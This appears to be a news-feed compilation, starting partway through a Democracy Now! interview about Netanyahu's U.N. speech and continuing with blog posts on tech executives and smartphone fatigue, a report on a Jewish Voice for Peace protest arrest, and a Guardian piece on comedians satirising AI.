PRIME MINISTER BENJAMIN NETANYAHU : They try to murder us, thousands of attempts per year on families, peaceful families driving along the roads. They shoot at pregnant women. They shoot entire families. Of course, none of this is covered in the international press or in the social media. None of it. None of it. What they cover is a handful of young juvenile delinquents, about 150 in number, who go — who throw stones, who chop down olive trees. Occasionally they do — they fire up. They lit some fires. I can’t stand that. I won’t stand for vigilantism. We’re a country of law. So we put our Shin Bet on them.

AMY GOODMAN : Daniel Levy, can you respond to what Netanyahu is — how he is describing the settlers on the West Bank?

DANIEL LEVY : Well, it’s very on brand for him to take this to its most extreme place by calling this a handful of juvenile delinquents. But actually, Netanyahu here is more closely aligned with many who talk about this as if the problem is settler violence. And here we have to understand that, yes, there is an issue there, but there is no such thing as a settler militia, as a settler, as a settlement, without the state of Israel. The problem is not a few, as he calls them, juvenile delinquents. The problem is the policy of the state and the government that he leads and that for decades has confiscated Palestinian land, displaced Palestinian people, built these settlers, armed the settlers, put the military in, prevented Palestinians from moving freely, connected these settlements to infrastructure, to water, to sewage. So this isn’t about a few juvenile delinquents, and it’s also not a broader question of settler violence. This is the policy of the government of Israel.

And shortly after that, if I may, Amy, he then turned not only — look, this was a domestic election broadcast in many respects, OK? Israel is in an election. It was — it was primetime TV. But he then turned beyond the Israeli electorate, and he turned to Jews around the world. And this is really important, because he said Jews should be proud of what Israel is doing. And you know what?

AMY GOODMAN : On —

DANIEL LEVY : We are seeing increasingly — can I — can I finish the thought? Carry on, Amy. Sorry.

AMY GOODMAN : Yes. No, no, go ahead.

DANIEL LEVY : Sure. I just want us to acknowledge here that there is nothing in what Israel is doing for Jewish people to feel proud of. That’s not a Jewish ethic. That’s not a Jewish value. And that is why, whether it’s Jewish Voice for Peace and others — and you were just referencing their demonstration — that is why there is an ever-growing and more significant cohort of Jewish people saying, “Do not claim to speak in our name. What you are doing is a blip in Jewish history. And actually, what you told us yesterday, and what you proved to us, is that the Zionist project, as you have lived it out, is not only a moral failure, but it is a practical failure,” because Netanyahu kept repeating, “We will win. We have no choice” — permanent war. You do have a choice. You can end occupation, apartheid and genocide. And Jews around the world, whether New York or anywhere else, have a choice not to align with those policies.

And that’s why you see that more Jews are aligned with the mayor of New York, who Netanyahu gave a tirade against. And we saw Mayor Mamdani with his dignity and his profound humanity with his video of planting an olive tree with Palestinian family. More Jews align with Mayor Mamdani than they do with that grotesque character and the policies that he represents, Netanyahu.

AMY GOODMAN : I wanted to go to the U.N. Secretary-General António Guterres, who said Israeli actions in the occupied West Bank raise the specter of ethnic cleansing.

SECRETARY - GENERAL ANTÓNIO GUTERRES : Violence, displacement and settlement expansion by Israel in the occupied West Bank are bulldozing the path to peace and raising the specter of ethnic cleansing. We cannot allow the two-state solution to disappear before our eyes.

AMY GOODMAN : The significance of the U.N. secretary-general saying this in addressing the U.N. General Assembly?

DANIEL LEVY : Look, we should be focused on the fact that under international law, everything we’re seeing there is a violation. You have U.N. independent commissions of inquiries that have made the designation that this is ethnic cleansing. We have that inquiry and elsewhere that has made the designation that these are — these are violations of the Genocide Convention. South Africa has a case at the International Court of Justice. Israel is already in violations of provisional measures that were issued to avoid genocidal crimes, and Israel has not done any of that.

And so, the crucial thing is to translate those words, whether it’s the words of Guterres, whether it’s the words of many of Israel’s allies in the West when they took to this podium, whether it’s the words of so many leaders in the Global South, that said that if you can’t uphold international law on this case, then the edifice, the structure of international legality is going to collapse. We have to translate that from words at the podium of the United Nations to policies which impose an arms embargo, which end the complicity in funding and financing Israel’s illegal settlements, for instance. Every Israeli bank is involved up to their eyeballs in investments, in loans, in mortgages, and you have to disentangle that from the international financial system. It will only happen if there’s more pressure, like the people out on the streets yesterday, like what we saw, by the way, in the U.K., where I normally am, where you are now, Amy, where after years of public pressure, you see a U.K. government that is beginning to move in significant ways in that direction. And that’s what’s going to change things; unfortunately, not more empty rhetoric here.

AMY GOODMAN : And talking about grassroots actions, the mayor of New York, Mayor Zohran Mamdani, planted olive trees at Gracie Mansion, planted them alongside Palestinian families from Gaza who had lost loved ones. Your final comments, Daniel Levy?

DANIEL LEVY : I think that is precisely the kind of dignified, responsible, peace-loving approach that should be taken and that should stand in contrast to what the Israeli prime minister offered us yesterday. And, you know, he’s shown that you can do that. You can have that olive tree planting at Gracie Mansion, and you can have the fantastic, very moving video that he released on the Jewish New Year, on Rosh Hashanah. You can straddle those divides if you believe in the universality of humanity rather than in the narrow warmongering of an ethnosupremacist state led by Prime Minister Netanyahu.

AMY GOODMAN : Daniel Levy, I want to thank you for being with us, president of the U.S./Middle East Project, former Israeli peace negotiator under two Israeli prime ministers, Ehud Barak and Yitzhak Rabin.

Coming up, Varsha Gandikota, executive secretary of the Hague Group, now sitting outside the United Nations. Stay with us.

[break]

AMY GOODMAN : Voices of protesters yesterday outside the U.N. protesting Israeli Prime Minister Benjamin Netanyahu.

The original content of this program is licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License . Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.

The Test

Hacker News
tante.cc
2026-09-25 08:14:02
Comments...
Original Article

Jensen Huang, the NVIDIA CEO and wearer of the most midlife crisis looking leather jackets in the world, was on Ezra Klein’s podcast . Now I don’t really want you do go through all of what was being said in that recording/writeup. It’s painful. You feel your mental capabilities decaying with every minute of listening … kinda like using a Chatbot. But worse.

Huang says many outrageous things in the podcast. Like when Klein asks about how kids don’t learn skills when using LLMs, Huang responds:

I completely agree. Try to get a kid to do long division right now. The multiplication table is starting to be forgotten. Doing square roots, my goodness. Basic math is being forgotten. Does it matter?
[…]
Yeah. I don’t think it does. I don’t think it does.

Jensen – I don’t think it matters that I build the technology that blocks kids from learning – Huang

Outrageous. But he needs to go on and top this statement with an even worse one:

There are a lot of skills that don’t matter. My first confession, I actually don’t know my address. […] It’s completely true. Janine will tell you and Lori will tell you.

One day I had to pump gas — it was a few years ago. They needed my ZIP code, and I panicked. I didn’t know my ZIP code. I don’t know my telephone number. I forget these things. I can live with it.

Jensen – I have literally nothing in common with human beings – Huang

So Huang is not the only person making these kinds of strange statements. Marc Andreessen proudly declaring not to have any introspection . Sam Altman talking about how how ChatGPT (and probably a bunch of nannies) basically raises his kid. Satya Nadella “staying informed” about the world by listening to – and talking to – podcasts that Microsoft Copilot generates for him.

This is not how actual people live. These are – for actual human beings – very embarrassing things to admit. Why would techbros do that? Constantly.

It of course brings to mind the famous quote from William Gibson’s Count Zero:

“And, for an instant, she stared directly into those soft blue eyes and knew, with an instinctive mammalian certainty, that the exceedingly rich were no longer even remotely human.”

And that is true to a degree: That level of access to money does shift how you see, how you interact with the world. It starts with you having a driver so you never have to park a car or go to the gas/charging station and only increases the more money you have. I would honestly not be surprised if those rich people wouldn’t even know where the washing machine is in their mansion. That’s what the help takes care of.

Money – like software – creates abstraction. Distance to the friction of the world . The ability to never be touched and to never have to touch anyone or anything. To have nobody else’s life, their existence as a person with needs and rights and hopes and feelings, matter. That probably is why rich folks – and those how aspire to that lifestyle – love “AI” so much.

But I think there is another aspect to those statements. They are a test.

Donald Trump (I think more subconsciously than intentionally) is a master of this kind of test. It goes like this: You state something outrageous for example “Lake Ontario is now called Lake America”. People should laugh at you because that is absurd. But some people will instantly call it Lake America (like Google changing what Google Maps says). Those are the people who have passed the test. They have debased themselves in public by following something completely off the rails marking themselves as obedient to the person who started the whole thing.

This is a typical kind of behavior you see in cults or for example right wing extremist groups: If you get people to tattoo a visible swastika on themselves they have not only declared their submission to the group but marked themselves as no longer part of the rest of society.

Everything we say has multiple functions and effects. I am not saying that Jensen Huang intentionally plants these weird-ass statements to test the people around him. I am saying that they do serve as a test though. Because in that interview, Klein could have pushed back on Huang. Really dug into how “ I don’t know my address ” is not about “ some skills are no longer required ” but about “ I am rich and pay a bunch of women to run my life like my mother used to “. Could have challenged that completely disconnected statement to kinda force Huang to step down from abstraction land down to the real world.

But he didn’t. Because he knows the consequences. If you do challenge those things you will not get those kinds of high-profile interviews. If you don’t take whatever those weird men say seriously you have failed the test. And that has consequences.

It is imperative for us to push back on that. Now we don’t get to talk to Jensen Huang – which might be good for our intellectual and psychological well-being – but we talk to people who might accept those statements and argue based on that. “Jensen Huang said that we don’t need those skills”, “Sam Altman said that Intelligence is something that we can just rent from OpenAI”, “Dario Amodei said AI might kill is all”. Weird and dumb shit that needs to be challenged.

We can’t save those broken men from themselves. We have way bigger tasks in front of us. One of those tasks is pushing back on those claims, pointing out how fucking weird those statements are, how they do not make any lick of sense.

Pointing that out, making that explicit, choosing to fail the test is powerful. It does give others the opportunity to step out of the often dominant “quirky tech bro is so visionary” narrative to realize how fucking weird those guys are. How little they know about life. About how to be a human. And that is power. That is connection. That is what allows us to push back on our lives, our social fabric being steamrolled by a bunch of unpleasant dudes.

The only way to actually win at that test is to fail it. Fail it as hard as you can.

Liked it? Take a second to support tante on Patreon!

Become a patron at Patreon!

CC BY-SA 4.0 This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License .

I'm Tired of Being on the Network

Hacker News
matduggan.com
2026-09-25 08:13:55
Comments...
Original Article

You can tell how tired someone is of the always-online life pretty easily. When they get home, watch the distance between the phone and the body. The people who love being connected never let the thing leave them be it pocket, palm, face-down next to the fork. Everyone else sets it down the way you drop a heavy backpack after a long day of walking. My wife does not set her phone down so much as launch it. From her hand to the far corner of the room, the phone travels from indispensable to litter in under a second.

For my part, I've come to resent the smartphone, which is an embarrassing thing to admit, because I used to be a believer. I researched every new model. I switched between iOS and Android just to taste each new future as it arrived. I lined up for the first iPhone at 3 a.m., stood in the dark to get a glimpse of the thing itself. I remember being genuinely moved when the Apple Store employees clapped for me. In hindsight this is mortifying, roughly on par with the year I dyed my hair blonde and shopped at Hot Topic. We used to have passionate arguments about whether iOS or Android was the future. Sitting here right now, I cannot tell you which model of iPhone is in my pocket. I can't name a single reason I'd upgrade, except that eventually the battery dies, and I don't feel like swapping it myself. Again.

It was a dream, for a while: internet everywhere, always. Star Trek made real. I could send an email from a country road. I could read a webpage from a bathroom, which, fine, is where a lot of it belonged. My first computer had no networking at all, and then: dial-up, ethernet, wireless, the phone in my pocket. Each step felt like proof that the future arrived on schedule. These were prized possessions. You cherished them. You had feelings about the merits of one versus another.

Now the smartphone is a tax. I get to choose my tax collector be it Apple, Samsung, Google, Nothing, Fairphone, but I don't get to choose whether to pay. In Denmark I'm expected to carry the Aula app for school, the Rejsekort app for trains, MitID to prove to the state that I am me, and e-Boks for official messages from the government and its authorized friends. I need the thing at the airport, at the hotel, at the gym. All of this, I'm told, is a choice. I "choose" to take part in the digital economy.

It isn't a choice in any meaningful sense. It's compliance. It's the one physical counter open Tuesdays from 10 to 12, and the ticket machine that no longer takes cash. And the offline option exists the way the wheelchair ramp exists at certain train stations: installed after the fact, satisfying a regulation, pitched at an angle no wheelchair on earth can climb. We are all expected to pretend grandma can make it up, and to act only mildly surprised when we find her at the bottom again.

So every few years I buy the identical slab of metal and glass. I admire the color for a moment, because color is the only decision left to make. The last honest pleasure in a new phone is peeling the plastic film off the screen after which the box contains nothing of interest. I put the slab in a case so durable I never see the color again, restore from backup, and everything the old slab knew migrates, whole and continuous, into the new one. A soul transfer, over Wi-Fi, in ninety seconds. I feel nothing for the old slab, despite years of daily intimacy. I hand it off or sell it and never think of it again.

I understood something had gone wrong in me the first time I dropped the phone and didn't mind. I was standing in my living room, mid-negotiation of a play date over WhatsApp, when an email arrived from my mother and a calendar alert reminded me I'd never scheduled the dog's vet appointment. It was as if the phone simply left my hands on its own. It hit the floor with that specific thonk of expensive object meeting laminate. When I picked it up and saw that the screen had survived, I was a tiny bit sad.

After that, I couldn't stop seeing everything I hated about the thing. It was like the last months of a relationship, when everything the other person does induces fury. Why am I out of storage? I don't control the size of the apps that install themselves, or whether my photos are kept at full resolution or quietly compressed into nothing. I'm not allowed to control any part of the experience, so I don't consider the disk space my fucking problem.

Apple pings me, yet again, about my three complimentary months of Apple Music. I open the App Store and find an endless sea of garbage with ads floating on top of the garbage, developers screaming for attention on the burning trash river that is the iOS App Store in 2026. My maps have ads. My apps have ads. Many of the ads are for installing more apps. My podcast app shows me an ad for a podcast about digital detox.

I get on my bike and start a podcast. The first thing I hear, at maximum volume, is a Danish advertisement for a new kind of sandwich bread. Then I learn about the grand opening of an electronics store at a mall near me. As I round the corner and join the mob of Danish cyclists, furiously ringing their bells at tourists, the hosts remind me I can subscribe to the premium edition of the podcast. I long for the days of driving through the night with AM radio, where at least the ads were interesting.

I have come to actively hate this rectangle of annoyances. It is a rectangle I carry from room to room and charge every night so it can go on notifying me, on behalf of applications I was forced to install, because somebody's OKR that quarter was "increase app installs by 15 percent." I don't need to know about the AliExpress sale. There is always an AliExpress sale.

To keep from subconsciously smashing the current slab and having to buy its successor, I started leaving the phone by the front door, next to where I stack the garbage. But the fatigue found me anyway. I'd sit down to play something and get hit with a dozen download prompts. The Steam Deck is always downloading something, or trying to. Streaming has ads now, or else the show has quietly gone missing. My wife and I say insane things to each other, like, "Which app had the show from last week?" HBO counts it off — "ad one of seven" — then detonates sports-betting commercials at maximum volume, until whatever fragile interest I had in the show dies of exposure.

There is an incredible sameness to all of it. Everyone online speaks in the same broken loop of the same ten phrases. Every streaming show (except, weirdly, Apple TV+, and who called that) is written as though I'm the stupidest person alive, plot beats arriving on schedule, like a waiter screaming the order at a customer with a head injury who has already nodded twice. Emily in Paris is on: the story of an American woman trapped in a Parisian time loop. She's with the French chef. Now she isn't. Now she is again. Different dress. Compared to what's arrived since, poor Emily is Shakespeare.

For short-form, TikTok offers a stranger's very confident opinion of an article they did not read. Instagram offers puppies and softcore pornography. For the long-form connoisseur there's Twitch, the premier cyber-dystopian hellscape, where a woman in a bathing suit films herself in a windowless room for twelve hours a day, or a man with nineteen subscribers sits in a sad home office on patchy carpet pleading, "Guys, come hang out with me!" I lingered once, out of a guilt I still can't locate, and he read my username out loud and welcomed me by name. I wanted to scream, not at him, but at the sheer horror of the situation.

The snake has begun eating itself. Netflix has shows about TikTok stars running their social-media empires. HBO has a murder documentary where most of the commentary is social-media clips of people theorizing about the murder. It's a closed loop. Soon we'll produce the documentary while the original event is still happening.

Whatever hope I had for the internet is long dead, and I've made a shaky peace with most of what killed it. We persist anyway because I can't retire and wouldn't have anything to do if I did.

How do you recharge your batteries in hell?

For me: a bare circuit board. I still like playing with tech, I just need something contained. I need something where I can just engage with something that doesn't involve a million hooks and attempts to get me to do something else.

I'd heard the MiSTer was the best way to play old video games. There are a million ways to play old video games now, and that's sort of the problem. Most "retro" devices come with fourteen million games preloaded, which means you play none of them. My whole session becomes scrolling an infinite menu of things I half-remember from the backs of comic books, dipping in and out, retaining nothing. What I wanted was fewer choices. Something that stays offline.

So I ordered one. Setup was easy: flash an SD card, run an update script, copy over the games. Then I pulled the ethernet cable out, and it kept working exactly as before which is both the entire point and, in 2026, a minor miracle. There is something deeply liberating about owning one object that does not attempt to walk me through an onboarding flow. No EULA. No cookie consent. From my television to my goddamn refrigerator, everything else in my life is clawing its way onto the internet. The MiSTer just sits there and does the job.

The refinement that made it click is TapTo or Zaparoo, depending on how old the website you're reading is. It's an NFC card system that allow for basically a physical shortcut to the game. Tap the card, the game loads. It sounds like a gimmick but it is actually the secret to why the whole thing works. It's the difference between scrolling a menu and picking a cartridge off a shelf, and it finally scratched the itch. (Time Extension reviewed it here: [link]. If you want the full rundown on what a MiSTer is and how it works, RetroRGB is the canonical source: [link].)

The short version of what the MiSTer does: software emulation is a very good impressionist doing an SNES. FPGA is reincarnation with the original chip logic rebuilt, cycle-accurate, no frame skip, able to drive a CRT if you happened to keep one. Is it objectively better than emulation? Who cares. Every slowdown, every piece of weirdness, belongs to the original game and not to some setting I need to go find. I do not open menus.

The end result looks like this (not my actual unit — I dropped it and cracked the plastic so: imagine this, but worse):

The first game I loaded was Crash Bandicoot for the PlayStation. When I played it as a kid, it was a technical marvel. It is hard to overstate how Crash looked and felt, coming from the Genesis and the NES. PS1 games in general have a soothing grammar, because they assume nothing. They know you rented this from a Blockbuster on a Friday night, that the manual is missing, and that you need to understand the game inside of thirty seconds.

Each Crash level introduces exactly one new thing, shows it to you up front in a low-stakes loop, and lets you figure it out. It starts easy. Then the mechanics stack, and stack, until the jumps demand something close to pixel-perfect, and I notice I'm leaning forward on the couch, fully dialed in to the triangle-headed marsupial.

It puts me back in the arcade at the mall a town over from my house. My dad would drop me off at the Defiance mall, which had a small arcade near the movie theater, across from the Chinese food stand in the food court. We'd line up in the dark for a shot at one of the Street Fighter II machines, quarters stacked on the bezel to call the next game. The carpet was always weirdly sticky. The joysticks were still sweaty from the last failed challenger. The mechanics of that era were simple, but you had to execute them perfectly, in public.

After a few hours I take a break. I pause the game and leave the box running, and hours later I come back to find everything exactly where I left it. No session expired. Nothing has decided I need to log in again. It just keeps humming, the little fan I installed purring away. It exists to keep doing the thing I asked it to do, and it has no other ambitions.

When we first got computers, this is simply what they were. By default they did nothing. They sat there and waited for you to have an idea. My old Macintosh LC II would basically wait around for inspiration to strike, or for me to waste an afternoon opening and closing folders, because software was expensive and folder-clicking was free. They felt like tools, not toys, and (ironically) the reason we knew how to do anything on them was that we spent hours poking around System 7, figuring out where everything lived. They crashed. Often, if we're being honest. But nothing in that machine wanted anything from me.

Look at that beauty

Is the MiSTer perfect? No. It's a board engineers test things on, and the software is flawed in exactly the ways you'd expect software like this to be flawed. The UI is clunky, pairing your first controller sorta sucks, and at no point has anyone optimized my experience. But it exists not as the physical manifestation of some roadmap I'll be subjected to later, but as a snapshot of a thing that exists on its own terms. Like the LC II, it's a thing designed to do a thing. It sits there with wires dangling out of it, doing exactly that.

It asks nothing of me. It knows nothing about me.

"Stop Arming Israel": 100+ Arrested at Jewish Voice for Peace Sit-In Outside Netanyahu U.N. Speech

Democracy Now!
www.democracynow.org
2026-09-25 08:13:55
Over 100 protesters were arrested near the United Nations in New York on Thursday ahead of Israeli Prime Minister Benjamin Netanyahu’s speech to the General Assembly. The sit-in, organized by Jewish Voice for Peace, denounced Netanyahu for perpetrating a genocide against Palestinians in Gaza, ...
Original Article

Over 100 protesters were arrested near the United Nations in New York on Thursday ahead of Israeli Prime Minister Benjamin Netanyahu’s speech to the General Assembly. The sit-in, organized by Jewish Voice for Peace, denounced Netanyahu for perpetrating a genocide against Palestinians in Gaza, building more illegal settlements in the West Bank, occupying parts of Lebanon and bombing Iran alongside the United States. Democracy Now! spoke with participants, including some congressional candidates and other prominent figures.


Transcript

This is a rush transcript. Copy may not be in its final form.

AMY GOODMAN : This is Democracy Now! , democracynow.org, The War and Peace Report . I’m Amy Goodman, today broadcasting from London, where the film about Democracy Now! , Steal This Story, Please! , is playing throughout the weekend in theaters. You can check our website at democracynow.org . I’ll be speaking along with the Oscar-nominated director after each film screening.

Israeli Prime Minister Benjamin Netanyahu addressed the United Nations General Assembly Thursday. In a few minutes, we’ll play excerpts of his address and get reaction from former Israeli peace negotiator Daniel Levy, who’s at the U.N. right now. But first to the streets outside the United Nations, where hundreds of protesters called on world leaders to stop arming Israel and to end the genocide in Gaza. Democracy Now! ’s Amba Guerguerian was there.

PROTESTERS : Stop arming Israel! Let Gaza live!

AMBA GUERGUERIAN : Ahead of Israeli Prime Minister Benjamin Netanyahu’s speech at the United Nations on Thursday, hundreds of demonstrators led by Jewish Voice for Peace staged a sit-in protest in New York City, stopping traffic for more than an hour just three blocks away from the U.N.’s headquarters. Over 100 protesters were arrested. Prominent figures, such as actors Susan Sarandon, Elliot Page, Hannah Einbinder and Cynthia Nixon, attended the protest. Democracy Now! spoke with some of the congressional candidates and elected officials who were there.

PROTESTERS : End the killing! Fight like hell for the living!

AMBA GUERGUERIAN : This is Darializa Avila Chevalier, a Democratic nominee for Congress from New York City.

DARIALIZA AVILA CHEVALIER : I’m here with so many New Yorkers to demand that Netanyahu be held accountable. He’s currently wanted by the ICC . And the irony is that so many New Yorkers here today will likely be the ones facing arrest, and not the person wanted for war crimes and crimes against humanity, before the very body that he’s set to speak in front of.

AMBA GUERGUERIAN : This is Chris Rabb, a Democratic nominee for Congress from Philadelphia.

REP . CHRIS RABB : We’ve got to speak up. And for those of us who are going to Congress, we have a responsibility to speak up for all those folks who are on the right side of history but do not have enough people in Congress holding people like him to account. We are complicit in those atrocities. We are funding that genocide. We are showing up on the frontlines, letting people know we see them, we care, we stand in solidarity with the people of Palestine and all over the Middle East who are victims of this extraordinary regime that’s working with Israel, because I’m talking about the Trump regime, and I’m talking about all those complicit in this genocide. We have to speak up. We have to acknowledge and affirm that Benjamin Netanyahu is a war criminal. He should be in The Hague, not the U.N.

AMBA GUERGUERIAN : This is Aber Kawas, a Democratic nominee for New York State Senate.

ABER KAWAS : I’m here today because Benjamin Netanyahu, who is the architect of a genocide that has been going on over three years of the Palestinian people, feels entitled enough to be welcomed onto the world stage, and we are letting him know that he is not welcome in New York.

PROTESTERS : Netanyahu, you can’t hide! We charge you with genocide!

AMBA GUERGUERIAN : This is Stefanie Fox, the executive director of Jewish Voice for Peace.

STEFANIE FOX : I’m the executive director of Jewish Voice for Peace. And we are here as Netanyahu makes his way to the U.N., an institution built to prevent the exact atrocities he’s perpetrating right this minute.

HANA ELIAS : These people risking arrest to make that point.

STEFANIE FOX : It’s the very least we can do in this moment, as this three years of genocide rages on, backed fully by U.S. government. And the complicity starts right here in the U.S. It’s absolutely our responsibility to demand that that impunity end and be replaced with accountability.

PROTESTERS : [singing] Rebel against the war they sell!

AMY GOODMAN : Thanks to Amba Guerguerian and Hana Elias for that report outside the United Nations.

At least 104 people were arrested, including nine elected officials and congressional and other candidates. Arrests included Democratic congressional nominee Darializa Avila Chevalier, actor Hannah Einbinder, author Glennon Doyle, whistleblower Chelsea Manning, Democratic state senator nominee Aber Kawas and Democratic state Assemblymember David Orkin. Over 20 New York city and state representatives participated in the demonstrations.

The original content of this program is licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License . Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.


Next story from this daily show

“Grotesque”: Ex-Israeli Negotiator Daniel Levy on Netanyahu’s U.N. Speech & Israel’s Impunity

The comedians turning AI anxiety into punchlines: ‘It’s so good, it’ll completely alter our grasp on reality’

Guardian
www.theguardian.com
2026-09-25 08:00:50
Across videos, standup and cartoons, humorists are skewering big tech’s attempt to make AI ubiquitous and inevitable “Best case scenario, we never have to do any admin again,” says an AI CEO. “Worst case, we all die.” A young man struggles to the top of a beautiful mountain, words echoing in his ear...
Original Article

“Best case scenario, we never have to do any admin again,” says an AI CEO . “Worst case, we all die.”

A young man struggles to the top of a beautiful mountain , words echoing in his ears: “AI will most likely lead to the end of the world, but in the meantime, there will be great companies created.” At the top of the mountain, he triumphantly holds up a sign: “Build a datacenter here.”

On the New York subway, posters herald what appear to be AI startups. “What if forks were spoons?” asks an ad for Cutlery.ai. Another advises viewers that Ziplink is now known as Froggle.

The posters are real, but the companies aren’t; the CEO and datacenter scenarios are social media sketches (though the “great companies” quote is a genuine piece of wisdom from Sam Altman). It’s all part of a recent wave of comedy inspired – but absolutely not generated – by AI.

The comedy extends across all forms of media: social videos, standup , songs , humor columns , comic strips and art installations . It takes aim at companies’ attempts to make AI ubiquitous, the dangers of believing its every word, its threats to society and the environment. It effectively punctures tech CEOs’ relentless narrative: that artificial intelligence represents humanity peaking; that it is inevitable and all-powerful; that we have no idea where it’s going and it could kill us all, but for some reason it is absolutely essential to pursue.

Allow Instagram content?

This article includes content provided by Instagram . We ask for your permission before anything is loaded, as they may be using cookies and other technologies. To view this content, click 'Allow and continue' .

It’s no surprise that a topic as pervasive as AI in 2026 would end up in comedians’ crosshairs. A March Gallup poll found 79% of Americans believe AI will reduce jobs. In a CNN poll this week, 81% of respondents said they were more concerned than excited about how the technology could “fundamentally change our way of life”. Only 11% of Americans would support the building of a datacenter locally, according to UMass Amherst . Meanwhile, a handful of impossibly wealthy weirdos wander between podcasts and conference stages boasting about their plans to fundamentally alter what it means to be human.

One way to expose the absurdity of the AI companies’ story is by exposing the flaws in their products. Ty Eveland , for instance, trolls AI doctors and HR professionals – the video bots you might awkwardly encounter at a virtual doctor’s appointment or job interview. Asked about marketing, he tells one bot interviewer he takes “everything with a grain of salt and maybe a little bit of pepper”. The bot, portrayed as a generically handsome blond man, responds earnestly: “When you say you take things with a grain of salt and pepper, what does that actually mean for a brand’s social media strategy?”

If bots are approaching superintelligence, this one has clearly been left behind.

Can you stop AI datacenters? Comedian Charlie Berens thinks so – Stateside with Kai and Carter

Other comedians parody the user experience: the comedian Aya Huseen, repeatedly popping out from behind a door, personifies tech companies’ desperate attempts to get users hooked on new AI features: “You sure you don’t want to try it with AI?” “This would be so much funner with AI.” “Just try generating it with AI.” The comedian Tom Nestor imagines “how people who love AI think we see them,” telling a friend on the phone: “Do you know what I also really like? It’s not so good now but in years to come it’ll get so good that it’ll just completely alter people’s grasp of reality.” In the Atlantic , the humorist Alexandra Petri recounts a dream in which everything in her life has pivoted to AI, from children’s books – Goldilocks and the 4.5 Bears – to her cereal, which features “subtle changes in the recipe, such as the nuts now being the hard, metal kind”.

Pro-human comedians have also taken aim at AI’s artistic pretensions. “If you are somebody who uses ChatGPT to generate videos, images, art, text, in an artistic capacity, to write for you, you are not somebody who deserves to be taken seriously,” said the comedian Caleb Hearon in a serious moment on his podcast . A comic strip titled “AI Design Logic” puts it more succinctly: “Get me a cheese pizza,” a diner tells a waiter. When the pizza arrives, the customer takes credit, exclaiming: “Wow, look what I made!” It’s simple, scathingly effective, and highly meme-able. Even more succinct is a T-shirt worn by the actor Ayo Edebiri: “Do not talk to me about AI. I will kill myself.”

The Altmans and Musks of the world may be louder than these comedians, but the collective weight of their jokes provides a counterbalance to the pro-AI declarations. “I would like to think that some of these [companies] are looking at the ridiculousness of where we’re at” and might be swayed by the success and relatability of comedy mocking their products, says Marwan Shaffey , whose videos include a takedown of a water-guzzling Google in 2026, with its Gemini-generated search results that are more about vibes than accuracy. “It does seem like the sentiment is changing, but I think it will take time.”

Comedy, of course, can cut through the noise in a way that serious lectures may not. That has been the experience of Alberta Devor, who spent six and a half years as a software engineer at Google. In one recent video , she offers a cool hack for when someone asks you a tricky question: instead of pulling out your phone and asking AI, it’s actually possible to use the LLM in your brain to produce a response. When a colleague wonders what “EOD” means, she immediately tells him. “How’d you ask Claude that so fast?” he asks. “I trained a model in my head,” she replies. “I just consumed a lot of media, a lot of books.”

Allow Instagram content?

This article includes content provided by Instagram . We ask for your permission before anything is loaded, as they may be using cookies and other technologies. To view this content, click 'Allow and continue' .

Devor herself is a regular AI user. Still, she’s concerned about overreliance on the products, whether they’re being used to seek information or to code. “The message that I want people to take home is to actually understand what they’re asking AI, to actually understand what the limitations of it are,” she says in an interview. Her serious videos on these topics often meet with some backlash. Comedy , she says, tends to find a more open audience. “It makes people want to engage more, and then you can start to get through to these more complex ideas,” she says. “Like maybe we should be using our brain.”

Not all the AI takedowns are themselves digital. The New York subway signs are the brainchildren of two comedians, Harris Alterman and Dave Ross, who designed a campaign mocking the inscrutable – and insufferable – language of bus-stop tech ads and San Francisco billboards.

A subway ad that says ‘what if Texas was upside-down?’
A fake tech subway ad by Harris Alterman and Dave Ross. Photograph: Harris Alterman/Harris Alterman and Dave Ross

“It was the quickest writing and creative process I’ve ever had,” Ross said. The tech advertising tropes were so clear, and so different from how any human has ever talked, that it was easy to satirize. “We made a big Google Doc of every keyword from all these things – ‘agents’, ‘democratize’ – and then we made 50 frameworks of these ads”: “finally, X that you can Y, or from X to Y in just one Z”. They rearranged and filled in the frameworks, Mad Libs-style, and had them printed.

Initially, the concept just seemed funny. “The more I talk about this, and it’s been months now, the more I realize just how disgusted I am with it,” Ross says of the ads’ language, which is “borderline offensive to the human brain”.

Other comics are equally clear-eyed in their message, and more direct in their advocacy. The British comedian Cody Dahler, condemning “techy tits” such as Palantir CEO Alex Karp, AKA “evil Art Garfunkel”, for creating systems “designed to set fire to everything we value as human beings”, has directly urged followers to speak out. Charlie Behrens of Wisconsin has led a fight against datacenters in that state. His parody news broadcasts – warning it could soon be “goodbye, America’s dairyland and hello, America’s motherboard” – led to him headlining gatherings of hundreds.

Sure, it may be “a little lofty to expect that your comedy could topple a billion-dollar corporation”, as Ross says. But we shouldn’t underestimate the power of comedy wielded en masse. Altman, the human face of ChatGPT, was recently presented with a clip of Husk, a former landscaper who recently reached a million followers, asking the bot to time a supposed long-distance run, which it got wildly wrong. Altman appeared sheepish: “It’s a known issue.”

Ross doesn’t believe comedians should be seen as philosophers, but it would be “wonderful”, he says, if humor “woke up an understanding in people’s minds that they’re also upset, and drove them toward questioning” our AI future.

It’s easy to feel helpless against a tide of supposed robotic inevitability. But each small act of comedy offers permission to question our self-appointed AI overlords – a little win for the humans.

Headlines for September 25, 2026

Democracy Now!
www.democracynow.org
2026-09-25 08:00:00
Dozens of U.N. Delegates Walk Out in Protest as Israel’s Netanyahu Addresses General Assembly, Over 100 Protesters Arrested Outside U.N. Demanding Arrest of Benjamin Netanyahu, Separatists Attack Government Forces in Ethiopia’s Worst Fighting Since 2022 Ceasefire, Opposition Groups Prote...
Original Article

Hi there,

Freedom of the press and our democracy are at greater risk than ever. Democracy Now! continues to spotlight the voices of groups and individuals striving to protect our first amendment rights and to keep our democracy intact. Please donate today, so we can keep you informed with the news that matters most as we navigate this unprecedented period.

Every dollar makes a difference

. Thank you so much!

Democracy Now!
Amy Goodman

Non-commercial news needs your support.

We rely on contributions from you, our viewers and listeners to do our work. If you visit us daily or weekly or even just once a month, now is a great time to make your monthly contribution.

Please do your part today.

Donate

Independent Global News

Donate

Headlines September 25, 2026

Watch Headlines

Dozens of U.N. Delegates Walk Out in Protest as Israel’s Netanyahu Addresses General Assembly

Sep 25, 2026

